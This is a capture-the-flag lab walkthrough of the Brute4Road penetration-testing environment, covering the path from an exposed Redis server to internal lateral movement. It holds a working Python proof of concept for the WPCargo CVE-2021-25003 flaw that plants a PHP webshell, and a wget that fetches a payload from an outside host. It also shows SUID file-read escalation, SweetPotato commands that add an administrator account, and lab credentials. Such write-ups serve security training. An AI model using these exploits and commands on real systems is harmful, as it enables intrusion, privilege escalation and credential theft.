Chunqiu Cloud Brute4Road Lab Walkthrough

A Brute4Road walkthrough covering Redis, Linux SUID escalation, proxy forwarding, and internal scanning, then obtaining four flags through WordPress, MSSQL, and domain credentials.

Chunqiu Cloud Brute4Road Lab Walkthrough

:::info There are four flags in total.

Lab introduction:

Brute4Road is a medium-difficulty lab environment. Completing this challenge helps players learn proxy forwarding, internal network scanning, information gathering, privilege escalation, and lateral movement in an internal penetration test; strengthens their understanding of core authentication mechanisms in domain environments; and teaches interesting techniques used in domain penetration testing. The lab has four flags distributed across different target machines.

For in-depth learning, I have written this up in some detail.

:::

After obtaining the target machine--->39.99.226.232, start by running fscan to take a look.

❯ ./fscan -h 39.99.226.232

We can see that there is:

  1. An FTP service with anonymous login.

There is nothing of interest after logging in.

  1. A Redis vulnerability.

We use it.

I learned about this tool:

GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

It can directly achieve RCE and obtain a shell.

Upgrade it slightly to a semi-interactive terminal.

python -c 'import pty; pty.spawn("/bin/bash")'

Here, use the Python service to upload the suupershell payload directly.

python3 -m http.server 2000
wget http://43.134.9.57:2000/11 -O /tmp

Connect to it and look for the flag.

There is no permission, so privilege escalation is needed.

Find this SUID for privilege escalation.

sh-4.2$ find / -user root -perm -4000 -print 2> result.txt
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl

/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

base64 | GTFOBins

The specific exploitation is as follows:

sudo install -m =xs $(which base64) .

LFILE=file_to_read
./base64 "$LFILE" | base64 --decode

Escalate privileges using SUID.

base64 "/home/redis/flag/flag01" | base64 --decode

Get the first flag.

Continue with internal network penetration.

Check the IP address.

Upload fscan; the scan results are as follows:

sh-4.2$ ./FScan_2.0.1_linux_x64 -h 172.22.2.0/24

The scan found an RCE vulnerability in a plugin, CVE-2021-25003.

WPCargo < 6.9.0 - Unauthenticated RCE

The POC is as follows:

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

Gather information and exploit it.

proxychains4 python3 WPCargo.py -t http://172.22.2.18/

The attack succeeded.

Upload a one-line webshell.

Connect to it.

No flag file was found, so check the configuration.

There is database content.

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Connect directly and inspect the contents.

We also find a database that serves as a hint. It contains some passwords, so export them directly.

There was an MSSQL machine earlier; let’s try password cracking against it.

The MSSQL password was indeed cracked.

sa: ElGNkOiC

Use the MDUT tool.

Connect to MSSQL.

Commands can be executed.

Escalate to system

Port 3389 (RDP) is open.

Use our privileges to create a higher-privilege account.

C:/Users/Public/SweetPotato.exe -a "netstat -ano"

C:/Users/Public/SweetPotato.exe -a "net user bx bx123456@ /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators bx /add"

We have also connected through Remote Desktop.

We have the privileges and obtain flag 3.

Check the system information.

It is in the xiaorang.lab domain.

Upload

The “monkey peach” tool finds a password.

Extract the key information.
